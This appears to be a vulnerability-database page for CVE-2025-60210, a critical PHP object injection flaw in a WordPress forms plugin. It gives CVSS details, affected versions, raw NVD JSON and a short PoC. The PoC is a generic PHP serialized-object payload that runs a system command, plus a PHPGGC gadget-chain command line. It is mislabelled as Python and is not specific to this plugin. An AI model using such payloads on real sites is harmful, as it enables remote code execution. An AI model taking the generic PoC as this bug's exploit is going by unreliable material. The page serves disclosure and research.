Security Vulnerability Report
中文
CVE-2025-60210 CVSS 9.8 CRITICAL

CVE-2025-60210

Published: 2025-10-22 15:15:58
Last Modified: 2026-01-20 15:17:32

Description

Deserialization of Untrusted Data vulnerability in wpeverest Everest Forms - Frontend Listing everest-forms-frontend-listing allows Object Injection.This issue affects Everest Forms - Frontend Listing: from n/a through <= 1.0.5.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wpeverest:everest_forms_frontend_listing:*:*:*:*:*:wordpress:*:* - VULNERABLE
Everest Forms - Frontend Listing <= 1.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-60210 PoC - PHP Object Injection in Everest Forms - Frontend Listing // Target: everest-forms-frontend-listing plugin <= 1.0.5 // Example malicious serialized payload structure // Attackers can use this with __destruct or __wakeup magic methods class MaliciousPayload { public $callback; public function __construct() { // This will be executed during object destruction $this->callback = 'system'; } public function __destruct() { // Execute arbitrary command via callback if (isset($this->callback)) { call_user_func($this->callback, 'whoami'); } } } // Generate malicious serialized object $malicious_obj = new MaliciousPayload(); $payload = serialize($malicious_obj); echo "Malicious Payload: " . $payload . "\n"; echo "URL encode for HTTP request:\n"; echo urlencode($payload) . "\n"; // Alternative: Using PHPGGC or similar tools for gadget chains // php phpggc.php -u Symfony/RCE4 'whoami' | url-encode ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60210", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:58.123", "lastModified": "2026-01-20T15:17:32.247", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in wpeverest Everest Forms - Frontend Listing everest-forms-frontend-listing allows Object Injection.This issue affects Everest Forms - Frontend Listing: from n/a through <= 1.0.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wpeverest:everest_forms_frontend_listing:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.0.5", "matchCriteriaId": "7E3212DD-321C-4EDB-9EB1-FDB71AC3F326"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/everest-forms-frontend-listing/vulnerability/wordpress-everest-forms-frontend-listing-plugin-1-0-5-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}